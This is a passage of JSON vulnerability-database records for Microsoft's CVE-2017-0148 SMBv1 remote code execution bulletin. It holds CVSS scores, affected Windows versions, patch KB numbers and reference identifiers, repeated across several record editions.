["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:44:02", "differentElements": ["msAffectedSoftware"], "edition": 54}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T20:55:04", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4013198", "KB3212646", "KB4012216", "KB4012606", "KB4012214", "KB3210720", "KBMS16-110, 3187754", "KB4012213", "KB3205409", "KB4012212", "KB4013429", "KB3177186", "KB4012215", "KB4012217", "KB4012598", "KB3213986", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:55:04", "differentElements": ["msAffectedSoftware"], "edition": 55}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-17T22:48:26", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 